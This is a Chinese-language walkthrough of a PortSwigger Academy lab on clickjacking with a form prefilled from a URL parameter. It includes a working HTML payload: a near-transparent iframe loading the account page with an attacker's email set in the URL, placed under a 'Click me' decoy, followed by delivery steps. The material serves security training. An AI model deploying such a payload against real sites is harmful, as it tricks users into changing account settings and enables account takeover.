Lab: Clickjacking with form input data prefilled from a URL parameter：使用从 URL 参数预填充的表单输入数据进行点击劫持...

靶场内容：

该实验室扩展了基本的点击劫持例如在实验室：基本点击劫持与CSRF令牌保护。
该实验室的目标是通过使用 URL 参数预填充表单并诱使用户无意中单击“更新电子邮件”按钮来更改用户的电子邮件地址。
为了解决这个实验，制作一些 HTML 来构建帐户页面，并通过单击“点击我”诱饵来欺骗用户更新他们的电子邮件地址。更改电子邮件地址后，实验室就解决了。
您可以使用以下凭据登录自己的帐户： wiener:peter

靶场分析

• 这个实验也很简单，目的是通过点击劫持诱导目标点击更新邮箱
• 而这个邮箱就是我们黑客的邮箱

<style>
   iframe {
       position:relative;
       width:700;
       height: 500;
       opacity: 0.0001;
       z-index: 2;
   }
   div {
       position:absolute;
       top:450;
       left:80;
       z-index: 1;
   }
</style>
<div>Click me</div>
<iframe src="https://acf81fac1e709c0d806f1378005800f7.web-security-academy.net/my-account?email=hacker@attacker-website.com"></iframe>

• 这个实验的类型是通过点击劫持实现对URL的篡改导致的黑客攻击
• 上面代码的参数适用于14寸屏幕的Chrome，参数需要自己调配，差不多就行
• 将上面的html代码粘贴到服务器的body处
• 将 $url 替换为目标网站的用户帐户页面的 URL，其中包含“update email”表单。
• 为 iframe 的 $height_value 和 $width_value 变量替换合适的像素值(我们分别建议 700px 和 500px)。
• 为诱饵网页内容的 $top_value 和 $side_value 变量替换合适的像素值，以便“更新电子邮件”按钮和“测试我”诱饵动作对齐(我们建议分别为 450px 和 80px)。
• 设置不透明度值 $opacity 以确保目标 iframe 是透明的。最初，使用 0.1 的不透明度，以便您可以对齐 iframe 操作并根据需要调整位置值。对于提交的攻击，值 0.0001 将起作用。
• 单击“store”，然后单击“view exploit”。
• 将鼠标悬停在“Test me”上并确保光标变为手形，表明 div 元素已正确定位。如果没有，则通过修改样式表的 top 和 left 属性来调整 div 元素的位置。
• 正确排列 div 元素后，将“Test me”更改为“Click me”，然后单击“Store”。
• 现在点击“deliver exploit to victim”，实验室应该就解决了。